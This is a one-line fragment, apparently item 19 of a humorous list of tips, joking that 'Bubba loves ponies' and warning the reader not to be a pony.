  • 19. Don't be stupid Bubba loves ponies, you don't want to be a pony...